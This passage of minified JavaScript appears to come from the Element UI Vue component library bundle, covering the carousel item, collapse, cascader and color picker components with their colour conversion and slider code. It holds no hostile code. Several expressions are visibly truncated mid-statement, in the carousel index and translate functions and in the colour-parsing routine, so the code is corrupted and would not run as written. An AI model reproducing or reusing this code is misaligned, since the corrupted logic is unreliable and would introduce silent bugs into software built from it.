i("div",{directives:[{name:"show",rawName:"v-show",value:e.ready,expression:"ready"}],staticClass:"el-carousel__item",class:{"is-active":e.active,"el-carousel__item--card":"card"===e.$parent.type,"is-in-stage":e.inStage,"is-hover":e.hover,"is-animating":e.animating},style:e.itemStyle,on:{click:e.handleItemClick}},["card"===e.$parent.type?i("div",{directives:[{name:"show",rawName:"v-show",value:!e.active,expression:"!active"}],staticClass:"el-carousel__mask"}):e._e(),e._t("default")],2)},Xd=[];Gd._withStripped=!0;var Zd=.83,Qd={name:"ElCarouselItem",props:{name:String,label:{type:[String,Number],default:""}},data:function(){return{hover:!1,translate:0,scale:1,active:!1,ready:!1,inStage:!1,animating:!1}},methods:{processIndex:function(e,t,i){return 0===t&&e===i-1?-1:t===i-1&&0===e?i:e=i/2?i+1:e>t+1&&e-t>=i/2?-2:e},calcCardTranslate:function(e,t){var i=this.$parent.$el.offsetWidth;return this.inStage?i*((2-Zd)*(e-t)+1)/4:e2&&this.$parent.loop&&(e=this.processIndex(e,t,r)),"card"===n)"vertical"===s&&console.warn("[Element Warn][Carousel]vertical direction is not supported in card mode"),this.inStage=Math.round(Math.abs(e-t))<=1,this.active=e===t,this.translate=this.calcCardTranslate(e,t),this.scale=this.active?1:Zd;else{this.active=e===t;var a="vertical"===s;this.translate=this.calcTranslate(e,t,a),this.scale=1}this.ready=!0},handleItemClick:function(){var e=this.$parent;if(e&&"card"===e.type){var t=e.items.indexOf(this);e.setActiveItem(t)}}},computed:{parentDirection:function(){return this.$parent.direction},itemStyle:function(){var e="vertical"===this.parentDirection?"translateY":"translateX",t=e+"("+this.translate+"px) scale("+this.scale+")",i={transform:t};return Object(b["autoprefixer"])(i)}},created:function(){this.$parent&&this.$parent.updateItems()},destroyed:function(){this.$parent&&this.$parent.updateItems()}},Jd=Qd,ep=o(Jd,Gd,Xd,!1,null,null,null);ep.options.__file="packages/carousel/src/item.vue";var tp=ep.exports;tp.install=function(e){e.component(tp.name,tp)};var ip=tp,np=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-collapse",attrs:{role:"tablist","aria-multiselectable":"true"}},[e._t("default")],2)},sp=[];np._withStripped=!0;var rp={name:"ElCollapse",componentName:"ElCollapse",props:{accordion:Boolean,value:{type:[Array,String,Number],default:function(){return[]}}},data:function(){return{activeNames:[].concat(this.value)}},provide:function(){return{collapse:this}},watch:{value:function(e){this.activeNames=[].concat(e)}},methods:{setActiveNames:function(e){e=[].concat(e);var t=this.accordion?e[0]:e;this.activeNames=e,this.$emit("input",t),this.$emit("change",t)},handleItemClick:function(e){if(this.accordion)this.setActiveNames(!this.activeNames[0]&&0!==this.activeNames[0]||this.activeNames[0]!==e.name?e.name:"");else{var t=this.activeNames.slice(0),i=t.indexOf(e.name);i>-1?t.splice(i,1):t.push(e.name),this.setActiveNames(t)}}},created:function(){this.$on("item-click",this.handleItemClick)}},ap=rp,op=o(ap,np,sp,!1,null,null,null);op.options.__file="packages/collapse/src/collapse.vue";var lp=op.exports;lp.install=function(e){e.component(lp.name,lp)};var cp=lp,up=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-collapse-item",class:{"is-active":e.isActive,"is-disabled":e.disabled}},[i("div",{attrs:{role:"tab","aria-expanded":e.isActive,"aria-controls":"el-collapse-content-"+e.id,"aria-describedby":"el-collapse-content-"+e.id}},[i("div",{staticClass:"el-collapse-item__header",class:{focusing:e.focusing,"is-active":e.isActive},attrs:{role:"button",id:"el-collapse-head-"+e.id,tabindex:e.disabled?void 0:0},on:{click:e.handleHeaderClick,keyup:function(t){return!("button"in t)&&e._k(t.keyCode,"space",32,t.key,[" ","Spacebar"])&&e._k(t.keyCode,"enter",13,t.key,"Enter")?null:(t.stopPropagation(),e.handleEnterClick(t))},focus:e.handleFocus,blur:function(t){e.focusing=!1}}},[e._t("title",[e._v(e._s(e.title))]),i("i",{staticClass:"el-collapse-item__arrow el-icon-arrow-right",class:{"is-active":e.isActive}})],2)]),i("el-collapse-transition",[i("div",{directives:[{name:"show",rawName:"v-show",value:e.isActive,expression:"isActive"}],staticClass:"el-collapse-item__wrap",attrs:{role:"tabpanel","aria-hidden":!e.isActive,"aria-labelledby":"el-collapse-head-"+e.id,id:"el-collapse-content-"+e.id}},[i("div",{staticClass:"el-collapse-item__content"},[e._t("default")],2)])])],1)},hp=[];up._withStripped=!0;var dp={name:"ElCollapseItem",componentName:"ElCollapseItem",mixins:[O.a],components:{ElCollapseTransition:Ke.a},data:function(){return{contentWrapStyle:{height:"auto",display:"block"},contentHeight:0,focusing:!1,isClick:!1,id:Object(b["generateId"])()}},inject:["collapse"],props:{title:String,name:{type:[String,Number],default:function(){return this._uid}},disabled:Boolean},computed:{isActive:function(){return this.collapse.activeNames.indexOf(this.name)>-1}},methods:{handleFocus:function(){var e=this;setTimeout((function(){e.isClick?e.isClick=!1:e.focusing=!0}),50)},handleHeaderClick:function(){this.disabled||(this.dispatch("ElCollapse","item-click",this),this.focusing=!1,this.isClick=!0)},handleEnterClick:function(){this.dispatch("ElCollapse","item-click",this)}}},pp=dp,fp=o(pp,up,hp,!1,null,null,null);fp.options.__file="packages/collapse/src/collapse-item.vue";var mp=fp.exports;mp.install=function(e){e.component(mp.name,mp)};var vp=mp,gp=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{directives:[{name:"clickoutside",rawName:"v-clickoutside",value:function(){return e.toggleDropDownVisible(!1)},expression:"() => toggleDropDownVisible(false)"}],ref:"reference",class:["el-cascader",e.realSize&&"el-cascader--"+e.realSize,{"is-disabled":e.isDisabled}],on:{mouseenter:function(t){e.inputHover=!0},mouseleave:function(t){e.inputHover=!1},click:function(){return e.toggleDropDownVisible(!e.readonly||void 0)},keydown:e.handleKeyDown}},[i("el-input",{ref:"input",class:{"is-focus":e.dropDownVisible},attrs:{size:e.realSize,placeholder:e.placeholder,readonly:e.readonly,disabled:e.isDisabled,"validate-event":!1},on:{focus:e.handleFocus,blur:e.handleBlur,input:e.handleInput},model:{value:e.multiple?e.presentText:e.inputValue,callback:function(t){e.multiple?e.presentText:e.inputValue=t},expression:"multiple ? presentText : inputValue"}},[i("template",{slot:"suffix"},[e.clearBtnVisible?i("i",{key:"clear",staticClass:"el-input__icon el-icon-circle-close",on:{click:function(t){return t.stopPropagation(),e.handleClear(t)}}}):i("i",{key:"arrow-down",class:["el-input__icon","el-icon-arrow-down",e.dropDownVisible&&"is-reverse"],on:{click:function(t){t.stopPropagation(),e.toggleDropDownVisible()}}})])],2),e.multiple?i("div",{staticClass:"el-cascader__tags"},[e._l(e.presentTags,(function(t){return i("el-tag",{key:t.key,attrs:{type:"info",size:e.tagSize,hit:t.hitState,closable:t.closable,"disable-transitions":""},on:{close:function(i){e.deleteTag(t)}}},[i("span",[e._v(e._s(t.text))])])})),e.filterable&&!e.isDisabled?i("input",{directives:[{name:"model",rawName:"v-model.trim",value:e.inputValue,expression:"inputValue",modifiers:{trim:!0}}],staticClass:"el-cascader__search-input",attrs:{type:"text",placeholder:e.presentTags.length?"":e.placeholder},domProps:{value:e.inputValue},on:{input:[function(t){t.target.composing||(e.inputValue=t.target.value.trim())},function(t){return e.handleInput(e.inputValue,t)}],click:function(t){t.stopPropagation(),e.toggleDropDownVisible(!0)},keydown:function(t){return!("button"in t)&&e._k(t.keyCode,"delete",[8,46],t.key,["Backspace","Delete","Del"])?null:e.handleDelete(t)},blur:function(t){e.$forceUpdate()}}}):e._e()],2):e._e(),i("transition",{attrs:{name:"el-zoom-in-top"},on:{"after-leave":e.handleDropdownLeave}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.dropDownVisible,expression:"dropDownVisible"}],ref:"popper",class:["el-popper","el-cascader__dropdown",e.popperClass]},[i("el-cascader-panel",{directives:[{name:"show",rawName:"v-show",value:!e.filtering,expression:"!filtering"}],ref:"panel",attrs:{options:e.options,props:e.config,border:!1,"render-label":e.$scopedSlots.default},on:{"expand-change":e.handleExpandChange,close:function(t){e.toggleDropDownVisible(!1)}},model:{value:e.checkedValue,callback:function(t){e.checkedValue=t},expression:"checkedValue"}}),e.filterable?i("el-scrollbar",{directives:[{name:"show",rawName:"v-show",value:e.filtering,expression:"filtering"}],ref:"suggestionPanel",staticClass:"el-cascader__suggestion-panel",attrs:{tag:"ul","view-class":"el-cascader__suggestion-list"},nativeOn:{keydown:function(t){return e.handleSuggestionKeyDown(t)}}},[e.suggestions.length?e._l(e.suggestions,(function(t,n){return i("li",{key:t.uid,class:["el-cascader__suggestion-item",t.checked&&"is-checked"],attrs:{tabindex:-1},on:{click:function(t){e.handleSuggestionClick(n)}}},[i("span",[e._v(e._s(t.text))]),t.checked?i("i",{staticClass:"el-icon-check"}):e._e()])})):e._t("empty",[i("li",{staticClass:"el-cascader__empty-text"},[e._v(e._s(e.t("el.cascader.noMatch")))])])],2):e._e()],1)])],1)},bp=[];gp._withStripped=!0;var yp=i(42),_p=i.n(yp),xp=i(34),Cp=i.n(xp),wp=Cp.a.keys,kp={expandTrigger:{newProp:"expandTrigger",type:String},changeOnSelect:{newProp:"checkStrictly",type:Boolean},hoverThreshold:{newProp:"hoverThreshold",type:Number}},Sp={props:{placement:{type:String,default:"bottom-start"},appendToBody:H.a.props.appendToBody,visibleArrow:{type:Boolean,default:!0},arrowOffset:H.a.props.arrowOffset,offset:H.a.props.offset,boundariesPadding:H.a.props.boundariesPadding,popperOptions:H.a.props.popperOptions},methods:H.a.methods,data:H.a.data,beforeDestroy:H.a.beforeDestroy},Dp={medium:36,small:32,mini:28},$p={name:"ElCascader",directives:{Clickoutside:V.a},mixins:[Sp,O.a,g.a,D.a],inject:{elForm:{default:""},elFormItem:{default:""}},components:{ElInput:m.a,ElTag:Qi.a,ElScrollbar:q.a,ElCascaderPanel:_p.a},props:{value:{},options:Array,props:Object,size:String,placeholder:{type:String,default:function(){return Object(vo["t"])("el.cascader.placeholder")}},disabled:Boolean,clearable:Boolean,filterable:Boolean,filterMethod:Function,separator:{type:String,default:" / "},showAllLevels:{type:Boolean,default:!0},collapseTags:Boolean,debounce:{type:Number,default:300},beforeFilter:{type:Function,default:function(){return function(){}}},popperClass:String},data:function(){return{dropDownVisible:!1,checkedValue:this.value,inputHover:!1,inputValue:null,presentText:null,presentTags:[],checkedNodes:[],filtering:!1,suggestions:[],inputInitialHeight:0,pressDeleteCount:0}},computed:{realSize:function(){var e=(this.elFormItem||{}).elFormItemSize;return this.size||e||(this.$ELEMENT||{}).size},tagSize:function(){return["small","mini"].indexOf(this.realSize)>-1?"mini":"small"},isDisabled:function(){return this.disabled||(this.elForm||{}).disabled},config:function(){var e=this.props||{},t=this.$attrs;return Object.keys(kp).forEach((function(i){var n=kp[i],s=n.newProp,r=n.type,a=t[i]||t[Object(b["kebabCase"])(i)];Object(Dt["isDef"])(i)&&!Object(Dt["isDef"])(e[s])&&(r===Boolean&&""===a&&(a=!0),e[s]=a)})),e},multiple:function(){return this.config.multiple},leafOnly:function(){return!this.config.checkStrictly},readonly:function(){return!this.filterable||this.multiple},clearBtnVisible:function(){return!(!this.clearable||this.isDisabled||this.filtering||!this.inputHover)&&(this.multiple?!!this.checkedNodes.filter((function(e){return!e.isDisabled})).length:!!this.presentText)},panel:function(){return this.$refs.panel}},watch:{disabled:function(){this.computePresentContent()},value:function(e){Object(b["isEqual"])(e,this.checkedValue)||(this.checkedValue=e,this.computePresentContent())},checkedValue:function(e){var t=this.value,i=this.dropDownVisible,n=this.config,s=n.checkStrictly,r=n.multiple;Object(b["isEqual"])(e,t)&&!Object(qh["isUndefined"])(t)||(this.computePresentContent(),r||s||!i||this.toggleDropDownVisible(!1),this.$emit("input",e),this.$emit("change",e),this.dispatch("ElFormItem","el.form.change",[e]))},options:{handler:function(){this.$nextTick(this.computePresentContent)},deep:!0},presentText:function(e){this.inputValue=e},presentTags:function(e,t){this.multiple&&(e.length||t.length)&&this.$nextTick(this.updateStyle)},filtering:function(e){this.$nextTick(this.updatePopper)}},mounted:function(){var e=this,t=this.$refs.input;t&&t.$el&&(this.inputInitialHeight=t.$el.offsetHeight||Dp[this.realSize]||40),this.isEmptyValue(this.value)||this.computePresentContent(),this.filterHandler=L()(this.debounce,(function(){var t=e.inputValue;if(t){var i=e.beforeFilter(t);i&&i.then?i.then(e.getSuggestions):!1!==i?e.getSuggestions():e.filtering=!1}else e.filtering=!1})),Object(Ji["addResizeListener"])(this.$el,this.updateStyle)},beforeDestroy:function(){Object(Ji["removeResizeListener"])(this.$el,this.updateStyle)},methods:{getMigratingConfig:function(){return{props:{"expand-trigger":"expand-trigger is removed, use `props.expandTrigger` instead.","change-on-select":"change-on-select is removed, use `props.checkStrictly` instead.","hover-threshold":"hover-threshold is removed, use `props.hoverThreshold` instead"},events:{"active-item-change":"active-item-change is renamed to expand-change"}}},toggleDropDownVisible:function(e){var t=this;if(!this.isDisabled){var i=this.dropDownVisible,n=this.$refs.input;e=Object(Dt["isDef"])(e)?e:!i,e!==i&&(this.dropDownVisible=e,e&&this.$nextTick((function(){t.updatePopper(),t.panel.scrollIntoView()})),n.$refs.input.setAttribute("aria-expanded",e),this.$emit("visible-change",e))}},handleDropdownLeave:function(){this.filtering=!1,this.inputValue=this.presentText,this.doDestroy()},handleKeyDown:function(e){switch(e.keyCode){case wp.enter:this.toggleDropDownVisible();break;case wp.down:this.toggleDropDownVisible(!0),this.focusFirstNode(),e.preventDefault();break;case wp.esc:case wp.tab:this.toggleDropDownVisible(!1);break}},handleFocus:function(e){this.$emit("focus",e)},handleBlur:function(e){this.$emit("blur",e)},handleInput:function(e,t){!this.dropDownVisible&&this.toggleDropDownVisible(!0),t&&t.isComposing||(e?this.filterHandler():this.filtering=!1)},handleClear:function(){this.presentText="",this.panel.clearCheckedNodes()},handleExpandChange:function(e){this.$nextTick(this.updatePopper.bind(this)),this.$emit("expand-change",e),this.$emit("active-item-change",e)},focusFirstNode:function(){var e=this;this.$nextTick((function(){var t=e.filtering,i=e.$refs,n=i.popper,s=i.suggestionPanel,r=null;if(t&&s)r=s.$el.querySelector(".el-cascader__suggestion-item");else{var a=n.querySelector(".el-cascader-menu");r=a.querySelector('.el-cascader-node[tabindex="-1"]')}r&&(r.focus(),!t&&r.click())}))},computePresentContent:function(){var e=this;this.$nextTick((function(){e.config.multiple?(e.computePresentTags(),e.presentText=e.presentTags.length?" ":null):e.computePresentText()}))},isEmptyValue:function(e){var t=this.multiple,i=this.panel.config.emitPath;return!(!t&&!i)&&Object(b["isEmpty"])(e)},computePresentText:function(){var e=this.checkedValue,t=this.config;if(!this.isEmptyValue(e)){var i=this.panel.getNodeByValue(e);if(i&&(t.checkStrictly||i.isLeaf))return void(this.presentText=i.getText(this.showAllLevels,this.separator))}this.presentText=null},computePresentTags:function(){var e=this.isDisabled,t=this.leafOnly,i=this.showAllLevels,n=this.separator,s=this.collapseTags,r=this.getCheckedNodes(t),a=[],o=function(t){return{node:t,key:t.uid,text:t.getText(i,n),hitState:!1,closable:!e&&!t.isDisabled}};if(r.length){var l=r[0],c=r.slice(1),u=c.length;a.push(o(l)),u&&(s?a.push({key:-1,text:"+ "+u,closable:!1}):c.forEach((function(e){return a.push(o(e))})))}this.checkedNodes=r,this.presentTags=a},getSuggestions:function(){var e=this,t=this.filterMethod;Object(qh["isFunction"])(t)||(t=function(e,t){return e.text.includes(t)});var i=this.panel.getFlattedNodes(this.leafOnly).filter((function(i){return!i.isDisabled&&(i.text=i.getText(e.showAllLevels,e.separator)||"",t(i,e.inputValue))}));this.multiple?this.presentTags.forEach((function(e){e.hitState=!1})):i.forEach((function(t){t.checked=Object(b["isEqual"])(e.checkedValue,t.getValueByOption())})),this.filtering=!0,this.suggestions=i,this.$nextTick(this.updatePopper)},handleSuggestionKeyDown:function(e){var t=e.keyCode,i=e.target;switch(t){case wp.enter:i.click();break;case wp.up:var n=i.previousElementSibling;n&&n.focus();break;case wp.down:var s=i.nextElementSibling;s&&s.focus();break;case wp.esc:case wp.tab:this.toggleDropDownVisible(!1);break}},handleDelete:function(){var e=this.inputValue,t=this.pressDeleteCount,i=this.presentTags,n=i.length-1,s=i[n];this.pressDeleteCount=e?0:t+1,s&&this.pressDeleteCount&&(s.hitState?this.deleteTag(s):s.hitState=!0)},handleSuggestionClick:function(e){var t=this.multiple,i=this.suggestions[e];if(t){var n=i.checked;i.doCheck(!n),this.panel.calculateMultiCheckedValue()}else this.checkedValue=i.getValueByOption(),this.toggleDropDownVisible(!1)},deleteTag:function(e){var t=this.checkedValue,i=e.node.getValueByOption(),n=t.find((function(e){return Object(b["isEqual"])(e,i)}));this.checkedValue=t.filter((function(e){return!Object(b["isEqual"])(e,i)})),this.$emit("remove-tag",n)},updateStyle:function(){var e=this.$el,t=this.inputInitialHeight;if(!this.$isServer&&e){var i=this.$refs.suggestionPanel,n=e.querySelector(".el-input__inner");if(n){var s=e.querySelector(".el-cascader__tags"),r=null;if(i&&(r=i.$el)){var a=r.querySelector(".el-cascader__suggestion-list");a.style.minWidth=n.offsetWidth+"px"}if(s){var o=Math.round(s.getBoundingClientRect().height),l=Math.max(o+6,t)+"px";n.style.height=l,this.dropDownVisible&&this.updatePopper()}}}},getCheckedNodes:function(e){return this.panel.getCheckedNodes(e)}}},Op=$p,Ep=o(Op,gp,bp,!1,null,null,null);Ep.options.__file="packages/cascader/src/cascader.vue";var Tp=Ep.exports;Tp.install=function(e){e.component(Tp.name,Tp)};var Pp=Tp,Mp=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{directives:[{name:"clickoutside",rawName:"v-clickoutside",value:e.hide,expression:"hide"}],class:["el-color-picker",e.colorDisabled?"is-disabled":"",e.colorSize?"el-color-picker--"+e.colorSize:""]},[e.colorDisabled?i("div",{staticClass:"el-color-picker__mask"}):e._e(),i("div",{staticClass:"el-color-picker__trigger",on:{click:e.handleTrigger}},[i("span",{staticClass:"el-color-picker__color",class:{"is-alpha":e.showAlpha}},[i("span",{staticClass:"el-color-picker__color-inner",style:{backgroundColor:e.displayedColor}}),e.value||e.showPanelColor?e._e():i("span",{staticClass:"el-color-picker__empty el-icon-close"})]),i("span",{directives:[{name:"show",rawName:"v-show",value:e.value||e.showPanelColor,expression:"value || showPanelColor"}],staticClass:"el-color-picker__icon el-icon-arrow-down"})]),i("picker-dropdown",{ref:"dropdown",class:["el-color-picker__panel",e.popperClass||""],attrs:{color:e.color,"show-alpha":e.showAlpha,predefine:e.predefine},on:{pick:e.confirmValue,clear:e.clearValue},model:{value:e.showPicker,callback:function(t){e.showPicker=t},expression:"showPicker"}})],1)},Np=[];Mp._withStripped=!0;var Ip="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e};function jp(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var Fp=function(e,t,i){return[e,t*i/((e=(2-t)*i)<1?e:2-e)||0,e/2]},Lp=function(e){return"string"===typeof e&&-1!==e.indexOf(".")&&1===parseFloat(e)},Ap=function(e){return"string"===typeof e&&-1!==e.indexOf("%")},Vp=function(e,t){Lp(e)&&(e="100%");var i=Ap(e);return e=Math.min(t,Math.max(0,parseFloat(e))),i&&(e=parseInt(e*t,10)/100),Math.abs(e-t)<1e-6?1:e%t/parseFloat(t)},Bp={10:"A",11:"B",12:"C",13:"D",14:"E",15:"F"},zp=function(e){var t=e.r,i=e.g,n=e.b,s=function(e){e=Math.min(Math.round(e),255);var t=Math.floor(e/16),i=e%16;return""+(Bp[t]||t)+(Bp[i]||i)};return isNaN(t)||isNaN(i)||isNaN(n)?"":"#"+s(t)+s(i)+s(n)},Rp={A:10,B:11,C:12,D:13,E:14,F:15},Hp=function(e){return 2===e.length?16*(Rp[e[0].toUpperCase()]||+e[0])+(Rp[e[1].toUpperCase()]||+e[1]):Rp[e[1].toUpperCase()]||+e[1]},Wp=function(e,t,i){t/=100,i/=100;var n=t,s=Math.max(i,.01),r=void 0,a=void 0;return i*=2,t*=i<=1?i:2-i,n*=s<=1?s:2-s,a=(i+t)/2,r=0===i?2*n/(s+n):2*t/(i+t),{h:e,s:100*r,v:100*a}},qp=function(e,t,i){e=Vp(e,255),t=Vp(t,255),i=Vp(i,255);var n=Math.max(e,t,i),s=Math.min(e,t,i),r=void 0,a=void 0,o=n,l=n-s;if(a=0===n?0:l/n,n===s)r=0;else{switch(n){case e:r=(t-i)/l+(t2?parseFloat(e):parseInt(e,10)}));if(4===n.length?this._alpha=Math.floor(100*parseFloat(n[3])):3===n.length&&(this._alpha=100),n.length>=3){var s=Wp(n[0],n[1],n[2]),r=s.h,a=s.s,o=s.v;i(r,a,o)}}else if(-1!==e.indexOf("hsv")){var l=e.replace(/hsva|hsv|\(|\)/gm,"").split(/\s|,/g).filter((function(e){return""!==e})).map((function(e,t){return t>2?parseFloat(e):parseInt(e,10)}));4===l.length?this._alpha=Math.floor(100*parseFloat(l[3])):3===l.length&&(this._alpha=100),l.length>=3&&i(l[0],l[1],l[2])}else if(-1!==e.indexOf("rgb")){var c=e.replace(/rgba|rgb|\(|\)/gm,"").split(/\s|,/g).filter((function(e){return""!==e})).map((function(e,t){return t>2?parseFloat(e):parseInt(e,10)}));if(4===c.length?this._alpha=Math.floor(100*parseFloat(c[3])):3===c.length&&(this._alpha=100),c.length>=3){var u=qp(c[0],c[1],c[2]),h=u.h,d=u.s,p=u.v;i(h,d,p)}}else if(-1!==e.indexOf("#")){var f=e.replace("#","").trim();if(!/^(?:[0-9a-fA-F]{3}){1,2}|[0-9a-fA-F]{8}$/.test(f))return;var m=void 0,v=void 0,g=void 0;3===f.length?(m=Hp(f[0]+f[0]),v=Hp(f[1]+f[1]),g=Hp(f[2]+f[2])):6!==f.length&&8!==f.length||(m=Hp(f.substring(0,2)),v=Hp(f.substring(2,4)),g=Hp(f.substring(4,6))),8===f.length?this._alpha=Math.floor(Hp(f.substring(6))/255*100):3!==f.length&&6!==f.length||(this._alpha=100);var b=qp(m,v,g),y=b.h,_=b.s,x=b.v;i(y,_,x)}},e.prototype.compare=function(e){return Math.abs(e._hue-this._hue)<2&&Math.abs(e._saturation-this._saturation)<1&&Math.abs(e._value-this._value)<1&&Math.abs(e._alpha-this._alpha)<1},e.prototype.doOnChange=function(){var e=this._hue,t=this._saturation,i=this._value,n=this._alpha,s=this.format;if(this.enableAlpha)switch(s){case"hsl":var r=Fp(e,t/100,i/100);this.value="hsla("+e+", "+Math.round(100*r[1])+"%, "+Math.round(100*r[2])+"%, "+n/100+")";break;case"hsv":this.value="hsva("+e+", "+Math.round(t)+"%, "+Math.round(i)+"%, "+n/100+")";break;default:var a=Yp(e,t,i),o=a.r,l=a.g,c=a.b;this.value="rgba("+o+", "+l+", "+c+", "+n/100+")"}else switch(s){case"hsl":var u=Fp(e,t/100,i/100);this.value="hsl("+e+", "+Math.round(100*u[1])+"%, "+Math.round(100*u[2])+"%)";break;case"hsv":this.value="hsv("+e+", "+Math.round(t)+"%, "+Math.round(i)+"%)";break;case"rgb":var h=Yp(e,t,i),d=h.r,p=h.g,f=h.b;this.value="rgb("+d+", "+p+", "+f+")";break;default:this.value=zp(Yp(e,t,i))}},e}(),Up=Kp,Gp=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-zoom-in-top"},on:{"after-leave":e.doDestroy}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.showPopper,expression:"showPopper"}],staticClass:"el-color-dropdown"},[i("div",{staticClass:"el-color-dropdown__main-wrapper"},[i("hue-slider",{ref:"hue",staticStyle:{float:"right"},attrs:{color:e.color,vertical:""}}),i("sv-panel",{ref:"sl",attrs:{color:e.color}})],1),e.showAlpha?i("alpha-slider",{ref:"alpha",attrs:{color:e.color}}):e._e(),e.predefine?i("predefine",{attrs:{color:e.color,colors:e.predefine}}):e._e(),i("div",{staticClass:"el-color-dropdown__btns"},[i("span",{staticClass:"el-color-dropdown__value"},[i("el-input",{attrs:{"validate-event":!1,size:"mini"},on:{blur:e.handleConfirm},nativeOn:{keyup:function(t){return!("button"in t)&&e._k(t.keyCode,"enter",13,t.key,"Enter")?null:e.handleConfirm(t)}},model:{value:e.customInput,callback:function(t){e.customInput=t},expression:"customInput"}})],1),i("el-button",{staticClass:"el-color-dropdown__link-btn",attrs:{size:"mini",type:"text"},on:{click:function(t){e.$emit("clear")}}},[e._v("\n "+e._s(e.t("el.colorpicker.clear"))+"\n ")]),i("el-button",{staticClass:"el-color-dropdown__btn",attrs:{plain:"",size:"mini"},on:{click:e.confirmValue}},[e._v("\n "+e._s(e.t("el.colorpicker.confirm"))+"\n ")])],1)],1)])},Xp=[];Gp._withStripped=!0;var Zp=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-color-svpanel",style:{backgroundColor:e.background}},[i("div",{staticClass:"el-color-svpanel__white"}),i("div",{staticClass:"el-color-svpanel__black"}),i("div",{staticClass:"el-color-svpanel__cursor",style:{top:e.cursorTop+"px",left:e.cursorLeft+"px"}},[i("div")])])},Qp=[];Zp._withStripped=!0;var Jp=!1,ef=function(e,t){if(!Rn.a.prototype.$isServer){var i=function(e){t.drag&&t.drag(e)},n=function e(n){document.removeEventListener("mousemove",i),document.removeEventListener("mouseup",e),document.onselectstart=null,document.ondragstart=null,Jp=!1,t.end&&t.end(n)};e.addEventListener("mousedown",(function(e){Jp||(document.onselectstart=function(){return!1},document.ondragstart=function(){return!1},document.addEventListener("mousemove",i),document.addEventListener("mouseup",n),Jp=!0,t.start&&t.start(e))}))}},tf={name:"el-sl-panel",props:{color:{required:!0}},computed:{colorValue:function(){var e=this.color.get("hue"),t=this.color.get("value");return{hue:e,value:t}}},watch:{colorValue:function(){this.update()}},methods:{update:function(){var e=this.color.get("saturation"),t=this.color.get("value"),i=this.$el,n=i.clientWidth,s=i.clientHeight;this.cursorLeft=e*n/100,this.cursorTop=(100-t)*s/100,this.background="hsl("+this.color.get("hue")+", 100%, 50%)"},handleDrag:function(e){var t=this.$el,i=t.getBoundingClientRect(),n=e.clientX-i.left,s=e.clientY-i.top;n=Math.max(0,n),n=Math.min(n,i.width),s=Math.max(0,s),s=Math.min(s,i.height),this.cursorLeft=n,this.cursorTop=s,this.color.set({saturation:n/i.width*100,value:100-s/i.height*100})}},mounted:function(){var e=this;ef(this.$el,{drag:function(t){e.handleDrag(t)},end:function(t){e.handleDrag(t)}}),this.update()},data:function(){return{cursorTop:0,cursorLeft:0,background:"hsl(0, 100%, 50%)"}}},nf=tf,sf=o(nf,Zp,Qp,!1,null,null,null);sf.options.__file="packages/color-picker/src/components/sv-panel.vue";var rf=sf.exports,af=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-color-hue-slider",class:{"is-vertical":e.vertical}},[i("div",{ref:"bar",staticClass:"el-color-hue-slider__bar",on:{click:e.handleClick}}),i("div",{ref:"thumb",staticClass:"el-color-hue-slider__thumb",style:{left:e.thumbLeft+"px",top:e.thumbTop+"px"}})])},of=[];af._withStripped=!0;var lf={name:"el-color-hue-slider",props:{color:{required:!0},vertical:Boolean},data:function(){return{thumbLeft:0,thumbTop:0}},computed:{hueValue:function(){var e=this.color.get("hue");return e}},watch:{hueValue:function(){this.update()}},methods:{handleClick:function(e){var t=this.$refs.thumb,i=e.target;i!==t&&this.handleDrag(e)},handleDrag:function(e){var t=this.$el.getBoundingClientRect(),i=this.$refs.thumb,n=void 0;if(this.vertical){var s=e.clientY-t.top;s=Math.min(s,t.height-i.offsetHeight/2),s=Math.max(i.offsetHeight/2,s),n=Math.round((s-i.offsetHeight/2)/(t.height-i.offsetHeight)*360)}else{var r=e.clientX-t.left;r=Math.min(r,t.width-i.offsetWidth/2),r=Math.max(i.offsetWidth/2,r),n=Math.round((r-i.offsetWidth/2)/(t.width-i.offsetWidth)*360)}this.color.set("hue",n)},getThumbLeft:function(){if(this.vertical)return 0;var e=this.$el,t=this.color.get("hue");if(!e)return 0;var i=this.$refs.thumb;return Math.round(t*(e.offsetWidth-i.offsetWidth/2)/360)},getThumbTop:function(){if(!this.vertical)return 0;var e=this.$el,t=this.color.get("hue");if(!e)return 0;var i=this.$refs.thumb;return Math.round(t*(e.offsetHeight-i.offsetHeight/2)/360)},update:function(){this.thumbLeft=this.getThumbLeft(),this.thumbTop=this.getThumbTop()}},mounted:function(){var e=this,t=this.$refs,i=t.bar,n=t.thumb,s={drag:function(t){e.handleDrag(t)},end:function(t){e.handleDrag(t)}};ef(i,s),ef(n,s),this.update()}},cf=lf,uf=o(cf,af,of,!1,null,null,null);uf.options.__file="packages/color-picker/src/components/hue-slider.vue";var hf=uf.exports,df=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-color-alpha-slider",class:{"is-vertical":e.vertical}},[i("div",{ref:"bar",staticClass:"el-color-alpha-slider__bar",style:{background:e.background},on:{click:e.handleClick}}),i("div",{ref:"thumb",staticClass:"el-color-alpha-slider__thumb",style:{left:e.thumbLeft+"px",top:e.thumbTop+"px"}})])},pf=[];df._withStripped=!0;var ff={name:"el-color-alpha-slider",props:{color:{required:!0},vertical:Boolean},watch:{"color._alpha":function(){this.update()},"color.value":function(){this.update()}},methods:{handleClick:function(e){var t=this.$refs.thumb,i=e.target;i!==t&&this.handleDrag(e)},handleDrag:function(e){var t=this.$el.getBoundingClientRect(),i=this.$refs.thumb;if(this.vertical){var n=e.clientY-t.top;n=Math.max(i.offsetHeight/2,n),n=Math.min(n,t.height-i.offsetHeight/2),this.color.set("alpha",Math.round((n-i.offsetHeight/2)/(t.height-i.offsetHeight)*100))}else{var 